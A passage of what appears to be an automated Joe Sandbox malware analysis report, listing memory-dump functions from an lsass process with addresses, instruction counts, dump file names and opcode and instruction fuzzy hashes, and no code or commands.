Instruction Fuzzy Hash: DD81B0B06156058FEB1CCF48C0E15B53BB5FF58315B9142BCC84B8B68ADB39E992CB81

Function 00007FFD9BEA39DE Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a8c7fea7afafe44fc04bb4f06c8026d6edd10865b19c5377812d0a57f1259ae
Instruction ID: bc7d21d3e7bcecad65760c7106f48aae9088c5b11404bfffc29458b613e90b63
Opcode Fuzzy Hash: 8a8c7fea7afafe44fc04bb4f06c8026d6edd10865b19c5377812d0a57f1259ae
Instruction Fuzzy Hash: BD613A70A0EA4A8FD35ADF58D0A05B4BBA4FF15310B1541BAC44EC7AD7DB29BD51C780

Function 00007FFD9BEA5037 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c8c57712e336885033fdec505c0058b072545c2a53ef792cbdf18c8e2eee01
Instruction ID: 3394946271fdaee85ff3570dec1be37737b7e01d654e3bfefc8b54a1336f6cd4
Opcode Fuzzy Hash: 88c8c57712e336885033fdec505c0058b072545c2a53ef792cbdf18c8e2eee01
Instruction Fuzzy Hash: 37610570A0AB4A8FD365CF54D1A05717BE5FF51300B51597EC48AC7AA3CB3AB882CB40

Function 00007FFD9BEAE597 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959731a4bc2af2ab8616a0f3090ad0ee34e6001bea85f4e551c914cee1b5d5c8
Instruction ID: ef77e431c7606bd599a516721cef9c8337350204ab2be388bd3808ddcea4d721
Opcode Fuzzy Hash: 959731a4bc2af2ab8616a0f3090ad0ee34e6001bea85f4e551c914cee1b5d5c8
Instruction Fuzzy Hash: D9518061B29A1D4FE7A8FB6888BA7B873D6FF98310F4101B9E40DC32E2DD256D458741

Function 00007FFD9BAB08D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a99c43255ad7cbd3df3f495e8f75efd95230d82982a471d5e73ea0f3f77d9a
Instruction ID: 1cb9c33c0e34460854eda12ddc650caebe698094076a5fe639eb870e6adbb39a
Opcode Fuzzy Hash: 42a99c43255ad7cbd3df3f495e8f75efd95230d82982a471d5e73ea0f3f77d9a
Instruction Fuzzy Hash: 5D413422B0C6690EE328F7BCA4A56F97B80DF5933AB0405BBE44ECB1D7DD14A841C684

Function 00007FFD9BAB0910 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7be7ff15ccf52f8e2500e04e690bc7277f9304d72f5b36073aa24b331958d49
Instruction ID: 81f4f44b19de12e66de38076fca37fa067492656114c3bef240544ea6ef565ea
Opcode Fuzzy Hash: b7be7ff15ccf52f8e2500e04e690bc7277f9304d72f5b36073aa24b331958d49
Instruction Fuzzy Hash: 83414822B0C6690FE328F7BCA4A55F97B80DF5933AB0405BBE44ECB1D7DD14A841C680

Function 00007FFD9BEA5637 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
Instruction ID: 6129ade46b3de4d677875558bd70af123c5920a248dd9bc0f77a25b186f1f8e2
Opcode Fuzzy Hash: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
Instruction Fuzzy Hash: 57414471B0D9488FDF98EF28C4A59A4B7E1FB78324B04456AD44AC75A2DE21E845CB81

Function 00007FFD9BEA0497 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
Instruction ID: 6ac0fcc1bbbe14278b262255691ecd1bd219ea035c8ebcb172155566ee661dd5
Opcode Fuzzy Hash: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
Instruction Fuzzy Hash: F941503260D9098FDF98EF18D465DA473E1FFA8320B0505AAE44EC7196DE25FC45CB81

Function 00007FFD9BEA56E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
Instruction ID: 57aaea844f98945e5c28fa0e902b4dbacd9453a5176a06a54cbd361022e192ef
Opcode Fuzzy Hash: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
Instruction Fuzzy Hash: 3D31867160C9488FDB98EF28C4A5DA477E1FF78324B0846ADD44AC75A2DE21F845CB81

Function 00007FFD9BEA0541 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
Instruction ID: 918b194f3042889a9ce48c94a3227d7132e632d2865588785767b1339879d820
Opcode Fuzzy Hash: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
Instruction Fuzzy Hash: 4D315E3260D9488FDF5CEF18C465EA473E1FFA9310B0506AEE45EC7196DE25E845CB81

Function 00007FFD9BAB0960 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402e43f77f0491d3e5512b06a1f13de5f9cb4cb39536367daa46f0a326161f21
Instruction ID: fb8ecd2c324807d4b28127302ef455ab0e1393bf65535bf54809a3193058541c
Opcode Fuzzy Hash: 402e43f77f0491d3e5512b06a1f13de5f9cb4cb39536367daa46f0a326161f21
Instruction Fuzzy Hash: B7310621B1892D0FE768B76C6866AF933C1DF5832AF4005BAE81EC71D7DC18AC458680

Function 00007FFD9BEAE9CD Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b68d3f7b72d6bd7b9ed110bb69bb348a86103cdb896ae8e3da8c657ab79e24
Instruction ID: 0889daadf30cfea94a0a9be57e7607d3f853f641f5fb81432ece4e283c397bd5
Opcode Fuzzy Hash: a4b68d3f7b72d6bd7b9ed110bb69bb348a86103cdb896ae8e3da8c657ab79e24
Instruction Fuzzy Hash: 8A31E382A0F7C50FE72246F81C69161BF94EF5265031D82FFE0E49A5E7D948AD498342

Function 00007FFD9BEA567B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
Instruction ID: 42fd417d77cb6f652ec17d75603295f93a5c2c9fc1af12c12c0e1b7cf8f1934d
Opcode Fuzzy Hash: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
Instruction Fuzzy Hash: D5319371B0C9498FDB98EF28C4A5DA4B7E1FF78320B0406ADD44AC75A2DE25F845CB81

Function 00007FFD9BEA04DB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
Instruction ID: 9dfff0f25abb073a2f1d6c24e7e1336136824c0324f50afe1082095a2ebf2377
Opcode Fuzzy Hash: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
Instruction Fuzzy Hash: 1631413260D9498FDF68EF18C465EA473E1FFA8710B0505AEE44EC7196DE25F885CB81

Function 00007FFD9BEA279D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 974fd0c49b58d40db7a6afe6ac996984c0cfb008be2212a562ce783983b2fc18
Instruction ID: 40ac5be5e16de5768afa088079747a18baf0a38468da838e292deae42724afe4
Opcode Fuzzy Hash: 974fd0c49b58d40db7a6afe6ac996984c0cfb008be2212a562ce783983b2fc18
Instruction Fuzzy Hash: EE317471B09A0E5FDB54DE98D5A29B8F7E5FF44310B114239D01ED3692DF247912CB80

Function 00007FFD9BEA02A5 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
Instruction ID: eaf7ecf8f8f708e2d78d61ba3390858b626b293fd36150bcc485da864f690ecb
Opcode Fuzzy Hash: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
Instruction Fuzzy Hash: 97316E70A1EA4ECFDBA8EF9484615BD77B8FF54701F51017AD00EC21A2DB3A6E448745

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c91ebfd6511bf2ae7cb04271f613db3fa0b60411b2902bddc540cb6b9136c9
Instruction ID: c13483a01d061de2fa9e6e57f6a2187e703c664a6fd33fae231950cab7a60662
Opcode Fuzzy Hash: c7c91ebfd6511bf2ae7cb04271f613db3fa0b60411b2902bddc540cb6b9136c9
Instruction Fuzzy Hash: 83216B21B1892D0FF758F76C9469AB972C2EF9C320F4000B9E81DC32E7DD54AC458681

Function 00007FFD9BEA2873 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a35b1b357d646c75e6d94d74f1008062ffb101b7fb2fbd9ef622ec0643b5fb
Instruction ID: a6691f9b8615e079f183b4c49ab229c6998fd9b2e9d6e3adeefa6c9a8779e20f
Opcode Fuzzy Hash: 77a35b1b357d646c75e6d94d74f1008062ffb101b7fb2fbd9ef622ec0643b5fb
Instruction Fuzzy Hash: E4213961F0E64D4FEB68A7E484622B8BBE8EF45310F050179D04DD32D3D91A99068740

Function 00007FFD9BEA31D1 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2263015e6e58c53404c0a255146b9140dc95305104888791782804becb5ad3
Instruction ID: a7c76e50d62187430b9537b567766d2d0bd04442929fd7f992ea7d948c773638
Opcode Fuzzy Hash: ad2263015e6e58c53404c0a255146b9140dc95305104888791782804becb5ad3
Instruction Fuzzy Hash: 8F21AB3160EA4E8FE7279B5488656F83798FF05300F0506BAD419CB2E2CA6A6605C781

Function 00007FFD9BEA1732 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
Instruction ID: d5779e646208f80ea610f81898db4520580076f458b8d556c0193aae41735f2d
Opcode Fuzzy Hash: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
Instruction Fuzzy Hash: 2D313A74A0991C9FDF98DB58C865AECB7B5FF59310F0002ADE04EE32A1CE35AA40CB41

Function 00007FFD9BEA545F Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
Instruction ID: 93ea4a5b1af4f4519ee3d648a24d17ec001cdcfff7e9cc1d537b35fd0ff1bc67
Opcode Fuzzy Hash: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
Instruction Fuzzy Hash: EE311CB0A1E90ECFEBA8DB9484625BD76EDFF44301F51047AE41FD21A1DA3A6A409B41

Function 00007FFD9BEAD485 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c675962be026c5a6a83d17fa0d9ae10361877331b86f9b447437e2dce15cf149
Instruction ID: fc0e4ca72914cbf5ce76956806e7720979509753bce15e9a01e01ed637b77bc2
Opcode Fuzzy Hash: c675962be026c5a6a83d17fa0d9ae10361877331b86f9b447437e2dce15cf149
Instruction Fuzzy Hash: 1E210A61B0DA4D4FE354E7B888A477473D9EF98314F0542BAD00DC72E7CD6D69498341

Function 00007FFD9BEA4360 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
Instruction ID: bb8f1cc2f548ba8bf761ae596f648c49945b553171fabcd0ee7c13781be7b16d
Opcode Fuzzy Hash: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
Instruction Fuzzy Hash: AB212B50A2E45F8BE338865848744B477BDEF50301B1985BDC44BCB4EBC92DBAC59381

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
Instruction ID: 43a0ad75c6292a8c0410512178bcf6d0a609864f92c5adfff7633a8a308eb563
Opcode Fuzzy Hash: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
Instruction Fuzzy Hash: F4213832B0D25D8FE732E7A89C250EC7B60EF42325F0541B3D5588B1D3DA382646CB85

Function 00007FFD9BEA0BE8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
Instruction ID: f66ec2e7d5e14ae53d9d34f79e11aaf0c5a3e88c1627f7144f103b6009c15f78
Opcode Fuzzy Hash: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
Instruction Fuzzy Hash: 23215075E1994ECFDB98DB98D8A09ECB7B5FF58300F11017AD00EE72A2DA296D05CB50

Function 00007FFD9BEA33E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56143059b5dcb282c0229496947620d68ded35af37e125e7c93c28428a269597
Instruction ID: e89db357d1f0c09127a0a7a6184ec4443fa92ca8f27299a3452364a7a4e2e6c9
Opcode Fuzzy Hash: 56143059b5dcb282c0229496947620d68ded35af37e125e7c93c28428a269597
Instruction Fuzzy Hash: 07110431B1AB0E9FDB6AAB6490619FA73E4FF54354B01063AD00EC75E2CE29B505CB80

Function 00007FFD9BEB15B2 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e602e7da71b625b07903b806221ef20a4fa33bc231f2436a400047d9669a1621
Instruction ID: 32f882aceebea75ef7b9e9420cda878c7a5f9ef467791743e42c0a570b840f4f
Opcode Fuzzy Hash: e602e7da71b625b07903b806221ef20a4fa33bc231f2436a400047d9669a1621
Instruction Fuzzy Hash: D7112731B2A95E4BF3A4EA5D88B47B073C6EF94321F484279D40DC32EADD29BD854781

Function 00007FFD9BEAD4A0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ce17d8fbee9976ac53c473f863880584a8c0e5be6e058e9eb6bc12ac9c9021
Instruction ID: 4dc772075eebbfad397a79c8e379ded5263de028b9cdda5c10f7b8bb30d299c9
Opcode Fuzzy Hash: 31ce17d8fbee9976ac53c473f863880584a8c0e5be6e058e9eb6bc12ac9c9021
Instruction Fuzzy Hash: A811E971B0994D4BE358FB7888A5B7572D9EF9C314F05427AE40EC72E6CE2979448340

Function 00007FFD9BAB3194 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad2a6eeef18ceeeb14d07e9daf6f425e58a15b45c0bd4f450234938f106769c
Instruction ID: 361f376605bcf4f043d1ba6cb24780d4c2a71083f44de534eef35745ed5d400b
Opcode Fuzzy Hash: 1ad2a6eeef18ceeeb14d07e9daf6f425e58a15b45c0bd4f450234938f106769c
Instruction Fuzzy Hash: A8119421F0A92E4BEBB0DB9888747B872E1EF58711F1142B7C42DD32B1DD68AE408F40

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945b6c202f68ee96f7258680ae12db74a64aecd14ad1ee2cb1556115108c3ad7
Instruction ID: 60c28d4f1c5ab7f894d3815f9e309929ac00c41e842e5a92f7ba6d84a0eb841f
Opcode Fuzzy Hash: 945b6c202f68ee96f7258680ae12db74a64aecd14ad1ee2cb1556115108c3ad7
Instruction Fuzzy Hash: 16110831B0D65D8FE732DBB988651EC7FB0EF42311F1644B7C054DB2A2EA7456458B84

Function 00007FFD9BEA816C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e816371c89fd529b240555a7ddd66236bd5e972223043fd67056c4b08d6764
Instruction ID: 4c74df4432ca2e5b2e681e9a881ca7e7382d44349f95b4233ed985b7a86ddcbb
Opcode Fuzzy Hash: b9e816371c89fd529b240555a7ddd66236bd5e972223043fd67056c4b08d6764
Instruction Fuzzy Hash: FA018470A0A60E8BE738DF54C4A17793799FF94300F52067AC449972F6DE3DBA418781

Function 00007FFD9BAB49B6 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc7d1ffd83821171b94f165a5ed44cb45259ed2614622081382f7f5a80aba901
Instruction ID: 82d3510084a0d742e9034039511c95484989bc917df67a674b3dbde11e08606a
Opcode Fuzzy Hash: cc7d1ffd83821171b94f165a5ed44cb45259ed2614622081382f7f5a80aba901
Instruction Fuzzy Hash: CC11B13190496C8FDBA8DB04C894B9D77B1EB58301F1585ADC40EE72A0CA75AE84CF85

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16717d544ccca9611bb0cca723affb2b43373dc4c6a30e8a65eb0cbedd274d43
Instruction ID: 42c4381682ee6f0b3b3b383c4e516abd6e980c4d4710ac3036c276ccd532c840
Opcode Fuzzy Hash: 16717d544ccca9611bb0cca723affb2b43373dc4c6a30e8a65eb0cbedd274d43
Instruction Fuzzy Hash: 2501D231B0E29C8FE722DBA888641EDBFB0EF42310F1645F7C454DB2A2DA345645CB84

Function 00007FFD9BEA81E1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc5bc062321c2859f8c02752c1ad0e7799a4b0c7665c0376f7cbd10d437b30d
Instruction ID: 57d3422f6f23d38fbe1eee45c134395ff27e7f67c20488c50ab1f42a5746e604
Opcode Fuzzy Hash: ddc5bc062321c2859f8c02752c1ad0e7799a4b0c7665c0376f7cbd10d437b30d
Instruction Fuzzy Hash: E001D130A0970D8BE734DF54C4917B937A5FFA4310F11067AC046972A7CA3AB941CBC0

Function 00007FFD9BEA1A42 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
Instruction ID: 5070d1e6b2dcae76a094dc5e8946e8e1eca50149055df94663671a39818a4809
Opcode Fuzzy Hash: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
Instruction Fuzzy Hash: 54F0967154F3C9AFD7228BB088215D93FB8EF43214B1A00F6D495CB0B2C56D5B46C762

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c597f3eb412ccf7ae1b4052d30f26890b97bef4a3bbf2576622ea034f6ef18b4
Instruction ID: 7e6abb73beeb39def28f7ac367a2a7777468cf1e6c06d81b415f0cf612dbc39b
Opcode Fuzzy Hash: c597f3eb412ccf7ae1b4052d30f26890b97bef4a3bbf2576622ea034f6ef18b4
Instruction Fuzzy Hash: 4701B131A0E28C8FE722DBA8886419CBFB0EF42310F1541E7D450DB2A6EA345644CB80

Function 00007FFD9BEAE989 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
